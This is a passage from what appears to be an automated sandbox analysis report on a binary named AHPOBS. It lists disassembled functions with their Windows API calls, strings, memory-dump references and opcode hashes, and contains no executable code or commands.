                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcscpy.LIBCMT ref: 00467641
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcslen.LIBCMT ref: 004677BD
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                      • String ID: X
                                      • API String ID: 3104067586-3081909835
                                      • Opcode ID: 62a65fcb1b778ace7bccfcde0373576fcf6fca270e4bd93cb190aa4d41a6e3dd
                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                      • Opcode Fuzzy Hash: 62a65fcb1b778ace7bccfcde0373576fcf6fca270e4bd93cb190aa4d41a6e3dd
                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                      Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                      • _wcslen.LIBCMT ref: 004610A3
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                      • String ID: ThumbnailClass
                                      • API String ID: 4136854206-1241985126
                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                      Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                      • String ID: 2
                                      • API String ID: 1331449709-450215437
                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                      Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                      • API String ID: 3054410614-2561132961
                                      • Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                      • Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                      Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 600699880-22481851
                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                      Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                      • API String ID: 2907320926-3566645568
                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                      Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                      • DeleteObject.GDI32(?), ref: 00470A04
                                      • DestroyIcon.USER32(?), ref: 00470A1C
                                      • DeleteObject.GDI32(?), ref: 00470A34
                                      • DestroyWindow.USER32(?), ref: 00470A4C
                                      • DestroyIcon.USER32(?), ref: 00470A73
                                      • DestroyIcon.USER32(?), ref: 00470A81
                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 1237572874-0
                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                      Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                      • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                      Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                      • GetKeyState.USER32(00000011), ref: 00444903
                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                      Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                      • String ID: AU3_FreeVar
                                      • API String ID: 2634073740-771828931
                                      • Opcode ID: b507345be42db7d231d4fe87dde8ac6b57174e0137230698672f4dfbf5c6882f
                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                      • Opcode Fuzzy Hash: b507345be42db7d231d4fe87dde8ac6b57174e0137230698672f4dfbf5c6882f
                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                      Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32 ref: 0046C63A
                                      • CoUninitialize.OLE32 ref: 0046C645
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 2294789929-1287834457
                                      • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                      • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                      Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                      • ReleaseCapture.USER32 ref: 0047116F
                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 2483343779-2107944366
                                      • Opcode ID: 84691534691ed2654ec9f54acb8cd948186dc9df3e1473831bff1d03c15b5f1e
                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                      • Opcode Fuzzy Hash: 84691534691ed2654ec9f54acb8cd948186dc9df3e1473831bff1d03c15b5f1e
                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                      Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                      • _wcslen.LIBCMT ref: 00450720
                                      • _wcscat.LIBCMT ref: 00450733
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
